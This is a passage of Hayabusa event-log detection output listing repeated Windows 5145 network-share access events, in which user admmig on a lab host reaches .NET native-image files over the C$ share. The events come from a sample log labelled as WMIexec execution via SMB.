File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 